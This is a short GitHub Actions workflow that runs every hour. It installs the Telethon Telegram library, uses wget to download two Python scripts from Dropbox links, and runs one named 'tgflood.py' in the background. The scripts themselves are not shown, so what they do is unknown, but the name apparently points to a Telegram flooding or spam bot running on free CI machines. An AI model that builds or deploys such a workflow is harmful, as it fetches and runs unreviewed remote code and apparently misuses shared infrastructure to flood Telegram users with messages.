name: Script

on:
  schedule:
    - cron: '0 * * * *'  # Запуск каждый час на 0 минуте
  workflow_dispatch:

jobs:
  build:
    name: Start Building...
    runs-on: ubuntu-latest
    
    steps:
      - name: Checkout repository
        uses: actions/checkout@v2

      - name: Run Tgflood Script
        run: |
          pip install telethon
          pip install --upgrade telethon
          wget "https://www.dropbox.com/scl/fi/26ffz5jlehn5msg7ujt3i/time.py?rlkey=kof30j4q0o3uvf2krqrxdxhyl&st=3fq2amn4&dl=1" -O time.py
          wget "https://www.dropbox.com/scl/fi/61dm67dascj3etwme4t6y/tgflood1.py?rlkey=i4x37mwn3mr40flafi0y00dan&st=2emr7620&dl=1" -O tgflood.py
          nohup python tgflood.py &
          python time.py
